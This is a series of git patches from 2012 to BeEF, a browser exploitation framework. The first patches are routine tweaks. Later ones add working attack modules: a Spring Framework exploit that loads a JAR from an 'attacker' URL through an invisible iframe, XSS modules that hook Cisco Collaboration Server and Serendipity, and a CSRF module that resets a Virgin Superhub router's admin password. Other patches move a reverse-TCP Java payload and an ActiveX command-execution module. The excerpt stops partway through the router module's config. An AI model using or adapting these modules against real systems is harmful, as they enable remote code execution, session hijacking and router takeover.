From aa8e073494ceab3f0b9cb0b901df926cfc8005ed Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Thu, 21 Jun 2012 12:34:26 +0100 Subject: [PATCH 01/17] Changes debug logs in the evasion main class. --- extensions/evasion/evasion.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/extensions/evasion/evasion.rb b/extensions/evasion/evasion.rb index b86cca957..aaf3019d9 100644 --- a/extensions/evasion/evasion.rb +++ b/extensions/evasion/evasion.rb @@ -37,10 +37,10 @@ module BeEF #2. call the "execute" method of the ruby module, passing the input #3. update the input in order that next technique will work on the pre-processed input. if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb") - print_debug "[OBFUSCATION] Applying technique [#{technique}]" klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance is_bootstrap_needed = klass.need_bootstrap if is_bootstrap_needed + print_debug "[OBFUSCATION] Adding bootstrapper for technique [#{technique}]" @bootstrap += klass.get_bootstrap end end From 0a34150cf7e87c2cbc559177b58a3c572b3d63e7 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Fri, 22 Jun 2012 21:01:09 +0100 Subject: [PATCH 02/17] Version updated --- VERSION | 2 +- config.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/VERSION b/VERSION index 509c304b2..f9105b3dc 100644 --- a/VERSION +++ b/VERSION @@ -14,4 +14,4 @@ # limitations under the License. # -0.4.3.5-alpha +0.4.3.6-alpha diff --git a/config.yaml b/config.yaml index 41728f809..b9d4f8f08 100644 --- a/config.yaml +++ b/config.yaml @@ -16,7 +16,7 @@ # BeEF Configuration file beef: - version: '0.4.3.5-alpha' + version: '0.4.3.6-alpha' debug: false restrictions: From c4e0ce17c4af254c99d0070a9362778b0436c7d3 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Fri, 22 Jun 2012 21:07:45 +0100 Subject: [PATCH 03/17] Added update file that calls git pull --- update-beef | 4 ++++ 1 file changed, 4 insertions(+) create mode 100755 update-beef diff --git a/update-beef b/update-beef new file mode 100755 index 000000000..2bd8188de --- /dev/null +++ b/update-beef @@ -0,0 +1,4 @@ +#!/bin/sh + +echo Updating... +git pull \ No newline at end of file From 900942f59cb3b1d22b68180f7c323a368b100bd4 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Sat, 23 Jun 2012 09:06:17 +0100 Subject: [PATCH 04/17] Added comment --- update-beef | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/update-beef b/update-beef index 2bd8188de..4524a540f 100755 --- a/update-beef +++ b/update-beef @@ -1,4 +1,19 @@ -#!/bin/sh +#!/bin/bash +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# echo Updating... git pull \ No newline at end of file From 49b85201d0c137c256a731aa47f061d738925386 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Sat, 23 Jun 2012 12:51:20 +0100 Subject: [PATCH 05/17] Changed print_success to print_info --- extensions/proxy/api.rb | 50 ++++++++++++++++++++--------------------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/extensions/proxy/api.rb b/extensions/proxy/api.rb index 96c67d586..13cf8dadf 100644 --- a/extensions/proxy/api.rb +++ b/extensions/proxy/api.rb @@ -14,33 +14,33 @@ # limitations under the License. # module BeEF -module Extension -module Proxy -module API + module Extension + module Proxy + module API - module RegisterHttpHandler + module RegisterHttpHandler - BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start') - BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler') - - def self.pre_http_start(http_hook_server) - config = BeEF::Core::Configuration.instance - Thread.new{ - http_hook_server.semaphore.synchronize{ - BeEF::Extension::Proxy::Proxy.new - } - } - print_success "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}" + BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start') + BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler') + + def self.pre_http_start(http_hook_server) + config = BeEF::Core::Configuration.instance + Thread.new{ + http_hook_server.semaphore.synchronize{ + BeEF::Extension::Proxy::Proxy.new + } + } + print_info "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}" + end + + def self.mount_handler(beef_server) + beef_server.mount('/proxy', BeEF::Extension::Requester::Handler) + end + + end + + + end end - - def self.mount_handler(beef_server) - beef_server.mount('/proxy', BeEF::Extension::Requester::Handler) - end - end - - -end -end -end end From 853b4c5bcb689a956aa50795ffe676ea56ff2d8c Mon Sep 17 00:00:00 2001 From: bcoles Date: Sat, 23 Jun 2012 22:44:34 +0930 Subject: [PATCH 06/17] Added Spring Framework Malicious JAR module Fixes issue #526 --- .../spring_framework_malicious_jar/command.js | 32 +++++++++++++++++++ .../config.yaml | 25 +++++++++++++++ .../spring_framework_malicious_jar/module.rb | 29 +++++++++++++++++ 3 files changed, 86 insertions(+) create mode 100644 modules/exploits/spring_framework_malicious_jar/command.js create mode 100644 modules/exploits/spring_framework_malicious_jar/config.yaml create mode 100644 modules/exploits/spring_framework_malicious_jar/module.rb diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js new file mode 100644 index 000000000..00804c652 --- /dev/null +++ b/modules/exploits/spring_framework_malicious_jar/command.js @@ -0,0 +1,32 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + jar_file = "<%= @jar_file %>"; + form_controller = "<%= @form_controller %>"; + + uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file; + var spring_iframe = beef.dom.createInvisibleIframe(); + spring_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(spring_iframe); + } + setTimeout("cleanup()", 15000); + +}); diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml new file mode 100644 index 000000000..87d59d542 --- /dev/null +++ b/modules/exploits/spring_framework_malicious_jar/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + spring_framework_malicious_jar: + enable: true + category: "Exploits" + name: "Spring Framework Malicious Jar" + description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/

Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)" + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb new file mode 100644 index 000000000..f1777b7f5 --- /dev/null +++ b/modules/exploits/spring_framework_malicious_jar/module.rb @@ -0,0 +1,29 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Spring_framework_malicious_jar < BeEF::Core::Command + + def self.options + return [ + {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'}, + {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end From aefc69354835b9ddd7bafeb840a4bb81e2090d6b Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 24 Jun 2012 00:57:01 +0930 Subject: [PATCH 07/17] Added balloon popups to hooked browser tree Part of issue #521 --- .../media/javascript/ui/panel/zombiesTreeList.js | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js index 5537ee34e..247a44fe9 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js +++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js @@ -36,6 +36,7 @@ zombiesTreeList = function(id) { //the tree node that contains the list of online hooked browsers this.online_hooked_browsers_treenode = this.root.appendChild( new Ext.tree.TreeNode({ + qtip: "Online hooked browsers", text:'Online Browsers', cls:'online-zombies-node', expanded:true @@ -45,6 +46,7 @@ zombiesTreeList = function(id) { //the tree node that contains the list of offline hooked browsers this.offline_hooked_browsers_treenode = this.root.appendChild( new Ext.tree.TreeNode({ + qtip: "Offline hooked browsers", text:'Offline Browsers', cls:'offline-zombies-node', expanded:false @@ -183,7 +185,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { */ addZombie: function(hooked_browser, online, checkbox) { var hb_id, mother_node, node; - + if(online) { hb_id = 'zombie-online-' + hooked_browser.session; mother_node = this.online_hooked_browsers_treenode; @@ -193,7 +195,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { } var exists = this.getNodeById(hb_id); if(exists) return; - + + hooked_browser.qtip = hooked_browser.text + ' hooked on ' + hooked_browser.domain + ":" + hooked_browser.port; + //save a new online HB if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) { this.online_hooked_browsers_array.push(hooked_browser); @@ -253,6 +257,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { sub_folder_node = new Ext.tree.TreeNode({ id: 'sub-folder-'+folder, text: folder, + qtip: "Browsers hooked on "+folder, checked: ((checkbox) ? false : null), type: this.tree_configuration["sub-branch"] }); From 40f8b528aae1199783da64832ab508c3d7b9f576 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 24 Jun 2012 03:10:54 +0930 Subject: [PATCH 08/17] Moved a few modules from modules/exploits/ to modules/exploits/local_host: activex_command_execution mozilla_nsiprocess_interface window_mail_client_dos java_payload safari_launch_app Added a couple of XSS modules: cisco_collaboration_server_5_xss serendipity_1.6_xss --- .../activex_command_execution/command.js | 0 .../activex_command_execution/config.yaml | 2 +- .../activex_command_execution/module.rb | 0 .../java_payload/AppletReverseTCP-0.2.jar | Bin .../java_payload/AppletReverseTCP-0.3rc1.jar | Bin .../{ => local_host}/java_payload/command.js | 0 .../{ => local_host}/java_payload/config.yaml | 2 +- .../{ => local_host}/java_payload/module.rb | 0 .../mozilla_nsiprocess_interface/command.js | 0 .../mozilla_nsiprocess_interface/config.yaml | 2 +- .../mozilla_nsiprocess_interface/module.rb | 0 .../safari_launch_app/command.js | 0 .../safari_launch_app/config.yaml | 2 +- .../safari_launch_app/module.rb | 0 .../window_mail_client_dos/command.js | 0 .../window_mail_client_dos/config.yaml | 2 +- .../window_mail_client_dos/module.rb | 0 .../command.js | 26 ++++++++++++++ .../config.yaml | 25 +++++++++++++ .../module.rb | 33 ++++++++++++++++++ .../xss/serendipity_1.6_xss/command.js | 26 ++++++++++++++ .../xss/serendipity_1.6_xss/config.yaml | 25 +++++++++++++ .../xss/serendipity_1.6_xss/module.rb | 33 ++++++++++++++++++ 23 files changed, 173 insertions(+), 5 deletions(-) rename modules/exploits/{ => local_host}/activex_command_execution/command.js (100%) rename modules/exploits/{ => local_host}/activex_command_execution/config.yaml (95%) rename modules/exploits/{ => local_host}/activex_command_execution/module.rb (100%) rename modules/exploits/{ => local_host}/java_payload/AppletReverseTCP-0.2.jar (100%) rename modules/exploits/{ => local_host}/java_payload/AppletReverseTCP-0.3rc1.jar (100%) rename modules/exploits/{ => local_host}/java_payload/command.js (100%) rename modules/exploits/{ => local_host}/java_payload/config.yaml (96%) rename modules/exploits/{ => local_host}/java_payload/module.rb (100%) rename modules/exploits/{ => local_host}/mozilla_nsiprocess_interface/command.js (100%) rename modules/exploits/{ => local_host}/mozilla_nsiprocess_interface/config.yaml (96%) rename modules/exploits/{ => local_host}/mozilla_nsiprocess_interface/module.rb (100%) rename modules/exploits/{ => local_host}/safari_launch_app/command.js (100%) rename modules/exploits/{ => local_host}/safari_launch_app/config.yaml (95%) rename modules/exploits/{ => local_host}/safari_launch_app/module.rb (100%) rename modules/exploits/{ => local_host}/window_mail_client_dos/command.js (100%) rename modules/exploits/{ => local_host}/window_mail_client_dos/config.yaml (96%) rename modules/exploits/{ => local_host}/window_mail_client_dos/module.rb (100%) create mode 100644 modules/exploits/xss/cisco_collaboration_server_5_xss/command.js create mode 100644 modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml create mode 100644 modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb create mode 100644 modules/exploits/xss/serendipity_1.6_xss/command.js create mode 100644 modules/exploits/xss/serendipity_1.6_xss/config.yaml create mode 100644 modules/exploits/xss/serendipity_1.6_xss/module.rb diff --git a/modules/exploits/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js similarity index 100% rename from modules/exploits/activex_command_execution/command.js rename to modules/exploits/local_host/activex_command_execution/command.js diff --git a/modules/exploits/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml similarity index 95% rename from modules/exploits/activex_command_execution/config.yaml rename to modules/exploits/local_host/activex_command_execution/config.yaml index 1e0995937..0a4d45a45 100755 --- a/modules/exploits/activex_command_execution/config.yaml +++ b/modules/exploits/local_host/activex_command_execution/config.yaml @@ -17,7 +17,7 @@ beef: module: activex_command_execution: enable: true - category: "Exploits" + category: ["Exploits", "Local Host"] name: "ActiveX Command Execution" description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.

The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled." authors: ["bcoles"] diff --git a/modules/exploits/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb similarity index 100% rename from modules/exploits/activex_command_execution/module.rb rename to modules/exploits/local_host/activex_command_execution/module.rb diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar similarity index 100% rename from modules/exploits/java_payload/AppletReverseTCP-0.2.jar rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar similarity index 100% rename from modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js similarity index 100% rename from modules/exploits/java_payload/command.js rename to modules/exploits/local_host/java_payload/command.js diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml similarity index 96% rename from modules/exploits/java_payload/config.yaml rename to modules/exploits/local_host/java_payload/config.yaml index 0d58413ba..651dedb7b 100755 --- a/modules/exploits/java_payload/config.yaml +++ b/modules/exploits/local_host/java_payload/config.yaml @@ -17,7 +17,7 @@ beef: module: java_payload: enable: true - category: "Exploits" + category: ["Exploits", "Local Host"] name: "Java Payload" description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.

Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh

Windows Vista is not supported." authors: ["antisnatchor"] diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb similarity index 100% rename from modules/exploits/java_payload/module.rb rename to modules/exploits/local_host/java_payload/module.rb diff --git a/modules/exploits/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js similarity index 100% rename from modules/exploits/mozilla_nsiprocess_interface/command.js rename to modules/exploits/local_host/mozilla_nsiprocess_interface/command.js diff --git a/modules/exploits/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml similarity index 96% rename from modules/exploits/mozilla_nsiprocess_interface/config.yaml rename to modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml index 7e1b71cd2..730bb4c79 100644 --- a/modules/exploits/mozilla_nsiprocess_interface/config.yaml +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml @@ -17,7 +17,7 @@ beef: module: mozilla_nsiprocess_interface: enable: false - category: "Exploits" + category: ["Exploits", "Local Host"] name: "Mozilla nsIProcess XPCOM Interface (Windows)" description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe

Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine." authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"] diff --git a/modules/exploits/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb similarity index 100% rename from modules/exploits/mozilla_nsiprocess_interface/module.rb rename to modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb diff --git a/modules/exploits/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js similarity index 100% rename from modules/exploits/safari_launch_app/command.js rename to modules/exploits/local_host/safari_launch_app/command.js diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml similarity index 95% rename from modules/exploits/safari_launch_app/config.yaml rename to modules/exploits/local_host/safari_launch_app/config.yaml index ba9de7df2..13200a95d 100755 --- a/modules/exploits/safari_launch_app/config.yaml +++ b/modules/exploits/local_host/safari_launch_app/config.yaml @@ -17,7 +17,7 @@ beef: module: safari_launch_app: enable: true - category: "Exploits" + category: ["Exploits", "Local Host"] name: "Safari Launch App" description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details.

Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel." authors: ["antisnatchor"] diff --git a/modules/exploits/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb similarity index 100% rename from modules/exploits/safari_launch_app/module.rb rename to modules/exploits/local_host/safari_launch_app/module.rb diff --git a/modules/exploits/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js similarity index 100% rename from modules/exploits/window_mail_client_dos/command.js rename to modules/exploits/local_host/window_mail_client_dos/command.js diff --git a/modules/exploits/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml similarity index 96% rename from modules/exploits/window_mail_client_dos/config.yaml rename to modules/exploits/local_host/window_mail_client_dos/config.yaml index 891f16919..25a643768 100644 --- a/modules/exploits/window_mail_client_dos/config.yaml +++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml @@ -17,7 +17,7 @@ beef: module: windows_mail_client_dos: enable: true - category: "Exploits" + category: ["Exploits", "Local Host"] name: "Windows Mail Client DoS" description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).

The protocol handler used will be: nntp." authors: ["bcoles"] diff --git a/modules/exploits/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb similarity index 100% rename from modules/exploits/window_mail_client_dos/module.rb rename to modules/exploits/local_host/window_mail_client_dos/module.rb diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js new file mode 100644 index 000000000..81933f79a --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js @@ -0,0 +1,26 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var cisco_collaboration_iframe = beef.dom.createInvisibleIframe(); + cisco_collaboration_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml new file mode 100644 index 000000000..3320a74f6 --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + cisco_collaboration_server_5_xss: + enable: true + category: ["Exploits", "XSS"] + name: "Cisco Collaboration Server 5 XSS" + description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/" + authors: ["bcoles", "s4squatch"] + target: + working: ["ALL"] diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb new file mode 100644 index 000000000..f0e42f7df --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb @@ -0,0 +1,33 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Cisco_collaboration_server_5_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js new file mode 100644 index 000000000..a20ff5bbb --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/command.js @@ -0,0 +1,26 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var serendipity_iframe = beef.dom.createInvisibleIframe(); + serendipity_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml new file mode 100644 index 000000000..96d9e9bb2 --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + serendipity_1_6_xss: + enable: true + category: ["Exploits", "XSS"] + name: "Serendipity <= 1.6 XSS" + description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/" + authors: ["bcoles", "Stefan Schurtz"] + target: + working: ["ALL"] diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb new file mode 100644 index 000000000..cf46a83d1 --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb @@ -0,0 +1,33 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Serendipity_1_6_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end From 771d6d60f9cb077c62e6d163e3ac7e1a8c89576f Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 24 Jun 2012 15:22:35 +0930 Subject: [PATCH 09/17] Added Virgin Superhub CSRF module Fixes issue #703 --- .../router/virgin_superhub_csrf/command.js | 35 +++++++++++++++++++ .../router/virgin_superhub_csrf/config.yaml | 25 +++++++++++++ .../router/virgin_superhub_csrf/module.rb | 29 +++++++++++++++ 3 files changed, 89 insertions(+) create mode 100644 modules/exploits/router/virgin_superhub_csrf/command.js create mode 100644 modules/exploits/router/virgin_superhub_csrf/config.yaml create mode 100644 modules/exploits/router/virgin_superhub_csrf/module.rb diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js new file mode 100644 index 000000000..5acb91421 --- /dev/null +++ b/modules/exploits/router/virgin_superhub_csrf/command.js @@ -0,0 +1,35 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + + var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [ + {'type':'hidden', 'name':'NetgearPassword', 'value':passwd} , + {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, + {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(virgin_superhub_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml new file mode 100644 index 000000000..11c11a548 --- /dev/null +++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net 